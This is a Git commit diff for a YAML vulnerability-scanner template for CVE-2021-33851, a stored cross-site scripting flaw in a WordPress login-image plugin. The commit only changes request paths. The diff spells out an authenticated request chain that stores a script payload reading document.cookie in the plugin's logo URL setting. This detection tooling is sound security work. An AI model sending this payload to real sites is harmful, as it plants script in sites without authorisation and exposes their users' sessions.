Update CVE-2021-33851.yaml

patch-1
8arthur 2022-10-21 16:20:20 +09:00 committed by GitHub
parent 3bf7813d98
commit 07eb4e5456
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions

View File

@ -21,25 +21,25 @@ info:
requests: requests:
- raw: - raw:
- | - |
POST /wordpress/wp-login.php HTTP/1.1 POST /wp-login.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In log={{username}}&pwd={{password}}&wp-submit=Log+In
- | - |
GET /wordpress/wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1 GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
- | - |
POST /wordpress/wp-admin/options.php HTTP/1.1 POST /wp-admin/options.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
option_page=customize-login-image-settings-group&action=update&_wpnonce={{_wpnonce}}&cli_logo_url=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E option_page=customize-login-image-settings-group&action=update&_wpnonce={{_wpnonce}}&cli_logo_url=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
- | - |
GET /wordpress/wp-login.php HTTP/1.1 GET /wp-login.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
extractors: extractors: